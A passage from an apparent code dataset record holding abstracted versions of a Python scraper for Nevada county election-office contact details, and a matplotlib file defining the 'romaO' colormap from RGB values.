\\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n <function token>\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n <function token>\n <function token>\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n <function token>\n <function token>\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n <function token>\n <function token>\n <function token>\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
45
5082182af5a08970568dc1ab7a53ee5337260687
# # romaO # www.fabiocrameri.ch/colourmaps from matplotlib.colors import LinearSegmentedColormap cm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251, 0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968, 0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178, 0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567, 0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833, 0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584, 0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345, 0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742, 0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628, 0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075, 0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665, 0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602, 0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415, 0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311, 0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808, 0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419, 0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771, 0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222, 0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233, 0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394, 0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413, 0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666, 0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354, 0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914, 0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694, 0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989, 0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803, 0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239, 0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252, 0.46174], [0.8296, 0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592, 0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666, 0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367, 0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835, 0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337, 0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724, 0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595, 0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395, 0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553, 0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934, 0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408, 0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425, 0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448, 0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947, 0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037, 0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612, 0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791, 0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207, 0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337, 0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658, 0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572, 0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066, 0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552, 0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889, 0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978, 0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695, 0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811, 0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456, 0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716, 0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178, 0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577, 0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627, 0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728, 0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927, 0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411, 0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336, 0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842, 0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655, 0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132, 0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823, 0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282, 0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855, 0.2246, 0.34773]] romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data) # For use of "viscm view" test_cm = romaO_map if __name__ == "__main__": import matplotlib.pyplot as plt import numpy as np try: from viscm import viscm viscm(romaO_map) except ImportError: print("viscm not found, falling back on simple display") plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=romaO_map) plt.show()
[ "# \n# romaO\n# www.fabiocrameri.ch/colourmaps\nfrom matplotlib.colors import LinearSegmentedColormap \n \ncm_data = [[0.45137, 0.22346, 0.34187], \n [0.45418, 0.22244, 0.3361], \n [0.45696, 0.22158, 0.33043], \n [0.45975, 0.2209, 0.32483], \n [0.46251, 0.22035, 0.31935], \n [0.46527, 0.21994, 0.31394], \n [0.46803, 0.21968, 0.30862], \n [0.47078, 0.21958, 0.30337], \n [0.47352, 0.21962, 0.29822], \n [0.47628, 0.21982, 0.29316], \n [0.47902, 0.22017, 0.28818], \n [0.48178, 0.22067, 0.2833], \n [0.48453, 0.2213, 0.2785], \n [0.48731, 0.22208, 0.27379], \n [0.49008, 0.22304, 0.26917], \n [0.49286, 0.22411, 0.26461], \n [0.49567, 0.22536, 0.26016], \n [0.4985, 0.22677, 0.25579], \n [0.50134, 0.22833, 0.25153], \n [0.50419, 0.22999, 0.24733], \n [0.50707, 0.23188, 0.24322], \n [0.50997, 0.23387, 0.23923], \n [0.5129, 0.23605, 0.23533], \n [0.51584, 0.23835, 0.23151], \n [0.51884, 0.24082, 0.22779], \n [0.52184, 0.24345, 0.22414], \n [0.52489, 0.24625, 0.22065], \n [0.52797, 0.2492, 0.2172], \n [0.53108, 0.25231, 0.21387], \n [0.53423, 0.25556, 0.21064], \n [0.53742, 0.25899, 0.20753], \n [0.54063, 0.26255, 0.20452], \n [0.54389, 0.26628, 0.20158], \n [0.54718, 0.27017, 0.19879], \n [0.55051, 0.27419, 0.19613], \n [0.55389, 0.27839, 0.19356], \n [0.55731, 0.28273, 0.19109], \n [0.56075, 0.2872, 0.18877], \n [0.56424, 0.29186, 0.18655], \n [0.56777, 0.29665, 0.18446], \n [0.57134, 0.30157, 0.18248], \n [0.57495, 0.30666, 0.18065], \n [0.5786, 0.31186, 0.17898], \n [0.58228, 0.31724, 0.17743], \n [0.58602, 0.32275, 0.17597], \n [0.58977, 0.32838, 0.17473], \n [0.59358, 0.33415, 0.17358], \n [0.59742, 0.34005, 0.17261], \n [0.60129, 0.34606, 0.17179], \n [0.60519, 0.35223, 0.17114], \n [0.60915, 0.35851, 0.17065], \n [0.61311, 0.36491, 0.17034], \n [0.61713, 0.37143, 0.1702], \n [0.62118, 0.37808, 0.17023], \n [0.62526, 0.38483, 0.17046], \n [0.62937, 0.39171, 0.17087], \n [0.63352, 0.39869, 0.17148], \n [0.63769, 0.40579, 0.17229], \n [0.6419, 0.41299, 0.17332], \n [0.64613, 0.42029, 0.17458], \n [0.65041, 0.42771, 0.176], \n [0.6547, 0.43522, 0.17774], \n [0.65904, 0.44283, 0.17962], \n [0.66341, 0.45054, 0.18175], \n [0.6678, 0.45834, 0.18416], \n [0.67222, 0.46625, 0.1868], \n [0.67667, 0.47425, 0.18968], \n [0.68114, 0.48233, 0.19283], \n [0.68566, 0.49051, 0.19624], \n [0.69019, 0.49878, 0.19987], \n [0.69474, 0.50712, 0.20384], \n [0.69933, 0.51554, 0.20803], \n [0.70394, 0.52406, 0.21251], \n [0.70858, 0.53265, 0.21726], \n [0.71322, 0.5413, 0.22229], \n [0.7179, 0.55003, 0.22761], \n [0.72257, 0.55881, 0.23318], \n [0.72727, 0.56767, 0.23907], \n [0.73197, 0.57658, 0.24521], \n [0.73666, 0.58553, 0.25168], \n [0.74136, 0.59451, 0.25837], \n [0.74605, 0.60354, 0.26537], \n [0.75073, 0.61259, 0.27263], \n [0.75538, 0.62166, 0.28017], \n [0.76001, 0.63075, 0.28796], \n [0.7646, 0.63982, 0.29602], \n [0.76914, 0.64889, 0.30433], \n [0.77363, 0.65793, 0.31287], \n [0.77806, 0.66694, 0.32165], \n [0.78242, 0.6759, 0.33066], \n [0.78669, 0.68481, 0.33988], \n [0.79087, 0.69365, 0.34929], \n [0.79494, 0.7024, 0.35888], \n [0.7989, 0.71106, 0.36867], \n [0.80273, 0.71961, 0.37859], \n [0.80642, 0.72803, 0.38866], \n [0.80996, 0.73631, 0.39885], \n [0.81334, 0.74446, 0.40916], \n [0.81655, 0.75244, 0.41957], \n [0.81956, 0.76025, 0.43004], \n [0.82239, 0.76787, 0.44057], \n [0.82501, 0.7753, 0.45115], \n [0.82742, 0.78252, 0.46174], \n [0.8296, 0.78953, 0.47235], \n [0.83155, 0.79631, 0.48293], \n [0.83326, 0.80287, 0.49349], \n [0.83472, 0.80919, 0.50402], \n [0.83592, 0.81526, 0.51449], \n [0.83686, 0.82109, 0.52487], \n [0.83753, 0.82666, 0.53517], \n [0.83793, 0.83198, 0.54537], \n [0.83805, 0.83703, 0.55546], \n [0.83788, 0.84182, 0.56542], \n [0.83744, 0.84635, 0.57525], \n [0.8367, 0.85061, 0.58493], \n [0.83567, 0.85462, 0.59446], \n [0.83435, 0.85835, 0.60382], \n [0.83274, 0.86183, 0.61301], \n [0.83084, 0.86504, 0.62202], \n [0.82864, 0.868, 0.63085], \n [0.82615, 0.87068, 0.63949], \n [0.82337, 0.87312, 0.64792], \n [0.8203, 0.87531, 0.65617], \n [0.81695, 0.87724, 0.6642], \n [0.81331, 0.87892, 0.67203], \n [0.80939, 0.88036, 0.67964], \n [0.80518, 0.88156, 0.68705], \n [0.80071, 0.8825, 0.69424], \n [0.79595, 0.88322, 0.70121], \n [0.79094, 0.8837, 0.70797], \n [0.78566, 0.88395, 0.7145], \n [0.78012, 0.88396, 0.72082], \n [0.77433, 0.88375, 0.72692], \n [0.7683, 0.88331, 0.73279], \n [0.76203, 0.88264, 0.73844], \n [0.75553, 0.88177, 0.74387], \n [0.74879, 0.88066, 0.74908], \n [0.74184, 0.87934, 0.75407], \n [0.73468, 0.87781, 0.75884], \n [0.72731, 0.87607, 0.76339], \n [0.71976, 0.87411, 0.76772], \n [0.71201, 0.87195, 0.77184], \n [0.70408, 0.86958, 0.77573], \n [0.69599, 0.86701, 0.77941], \n [0.68774, 0.86425, 0.78288], \n [0.67934, 0.86127, 0.78614], \n [0.67081, 0.85811, 0.78919], \n [0.66215, 0.85476, 0.79202], \n [0.65336, 0.8512, 0.79465], \n [0.64448, 0.84747, 0.79707], \n [0.6355, 0.84356, 0.7993], \n [0.62645, 0.83947, 0.80131], \n [0.61732, 0.83519, 0.80313], \n [0.60814, 0.83075, 0.80476], \n [0.59891, 0.82614, 0.80619], \n [0.58965, 0.82137, 0.80743], \n [0.58037, 0.81644, 0.80848], \n [0.57108, 0.81135, 0.80935], \n [0.56181, 0.80612, 0.81004], \n [0.55255, 0.80074, 0.81055], \n [0.54332, 0.79522, 0.81088], \n [0.53412, 0.78958, 0.81105], \n [0.525, 0.7838, 0.81105], \n [0.51593, 0.77791, 0.81088], \n [0.50695, 0.77189, 0.81055], \n [0.49808, 0.76577, 0.81007], \n [0.48928, 0.75954, 0.80944], \n [0.48061, 0.75321, 0.80866], \n [0.47207, 0.7468, 0.80773], \n [0.46365, 0.74029, 0.80667], \n [0.45539, 0.7337, 0.80546], \n [0.44728, 0.72703, 0.80413], \n [0.43934, 0.7203, 0.80266], \n [0.43158, 0.7135, 0.80107], \n [0.42398, 0.70664, 0.79936], \n [0.41658, 0.69971, 0.79752], \n [0.40938, 0.69275, 0.79557], \n [0.40237, 0.68572, 0.79351], \n [0.3956, 0.67865, 0.79133], \n [0.38903, 0.67155, 0.78905], \n [0.38267, 0.66441, 0.78666], \n [0.37656, 0.65724, 0.78416], \n [0.37066, 0.65003, 0.78155], \n [0.36502, 0.64279, 0.77884], \n [0.35961, 0.63552, 0.77604], \n [0.35446, 0.62824, 0.77312], \n [0.34955, 0.62094, 0.77011], \n [0.3449, 0.6136, 0.767], \n [0.34051, 0.60625, 0.76378], \n [0.33637, 0.59889, 0.76047], \n [0.33253, 0.59151, 0.75704], \n [0.32893, 0.58412, 0.75351], \n [0.32559, 0.57671, 0.74987], \n [0.32256, 0.56928, 0.74613], \n [0.31978, 0.56186, 0.74228], \n [0.31727, 0.55441, 0.7383], \n [0.31505, 0.54695, 0.73422], \n [0.31311, 0.53948, 0.73002], \n [0.31144, 0.53201, 0.72569], \n [0.31007, 0.52453, 0.72124], \n [0.30897, 0.51704, 0.71667], \n [0.30811, 0.50955, 0.71197], \n [0.30755, 0.50205, 0.70713], \n [0.30726, 0.49456, 0.70216], \n [0.30723, 0.48707, 0.69706], \n [0.30746, 0.47958, 0.69182], \n [0.30795, 0.4721, 0.68643], \n [0.3087, 0.46463, 0.6809], \n [0.30968, 0.45716, 0.67525], \n [0.31088, 0.44973, 0.66944], \n [0.31228, 0.44232, 0.6635], \n [0.31393, 0.43493, 0.65741], \n [0.31578, 0.42758, 0.65118], \n [0.3178, 0.42025, 0.64482], \n [0.32001, 0.41299, 0.63833], \n [0.32238, 0.40577, 0.6317], \n [0.32489, 0.39861, 0.62495], \n [0.32755, 0.39152, 0.61809], \n [0.33035, 0.38448, 0.61111], \n [0.33327, 0.37755, 0.60402], \n [0.33627, 0.37068, 0.59684], \n [0.33939, 0.36392, 0.58955], \n [0.34257, 0.35728, 0.58219], \n [0.3458, 0.35073, 0.57476], \n [0.34912, 0.34428, 0.56727], \n [0.35247, 0.33797, 0.55971], \n [0.35587, 0.33179, 0.55212], \n [0.35927, 0.32574, 0.54448], \n [0.36271, 0.31986, 0.53684], \n [0.36617, 0.31411, 0.52917], \n [0.36961, 0.30852, 0.52148], \n [0.37306, 0.30306, 0.51382], \n [0.37652, 0.2978, 0.50615], \n [0.37994, 0.29269, 0.49854], \n [0.38336, 0.28775, 0.49094], \n [0.38674, 0.28301, 0.48337], \n [0.39011, 0.27842, 0.47586], \n [0.39346, 0.27401, 0.4684], \n [0.39677, 0.26978, 0.461], \n [0.40006, 0.26573, 0.45366], \n [0.40333, 0.26185, 0.4464], \n [0.40655, 0.25815, 0.43921], \n [0.40974, 0.25466, 0.43212], \n [0.4129, 0.25132, 0.42509], \n [0.41602, 0.24817, 0.41813], \n [0.41912, 0.24515, 0.41128], \n [0.42218, 0.24235, 0.40451], \n [0.42522, 0.23972, 0.39784], \n [0.42823, 0.23728, 0.39126], \n [0.43121, 0.23498, 0.38475], \n [0.43415, 0.23282, 0.37836], \n [0.43708, 0.23086, 0.37204], \n [0.43998, 0.22907, 0.36583], \n [0.44286, 0.22743, 0.3597], \n [0.44571, 0.22596, 0.35366], \n [0.44855, 0.2246, 0.34773]] \n \nromaO_map = LinearSegmentedColormap.from_list('romaO', cm_data) \n# For use of \"viscm view\" \ntest_cm = romaO_map \n \nif __name__ == \"__main__\": \n import matplotlib.pyplot as plt \n import numpy as np \n \n try: \n from viscm import viscm \n viscm(romaO_map) \n except ImportError: \n print(\"viscm not found, falling back on simple display\") \n plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', \n cmap=romaO_map) \n plt.show() \n", "from matplotlib.colors import LinearSegmentedColormap\ncm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [\n 0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251, \n 0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968, \n 0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [\n 0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178, \n 0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379\n ], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567, \n 0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833, \n 0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [\n 0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584, \n 0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345, \n 0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [\n 0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742, \n 0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628, \n 0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [\n 0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075, \n 0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665, \n 0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [\n 0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602, \n 0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415, \n 0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [\n 0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311, \n 0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808, \n 0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [\n 0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419, \n 0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771, \n 0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [\n 0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222, \n 0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233, \n 0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [\n 0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394, \n 0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413, \n 0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [\n 0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666, \n 0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354, \n 0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [\n 0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914, \n 0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694, \n 0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [\n 0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989, \n 0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803, \n 0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [\n 0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239, \n 0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252, \n 0.46174], [0.8296, 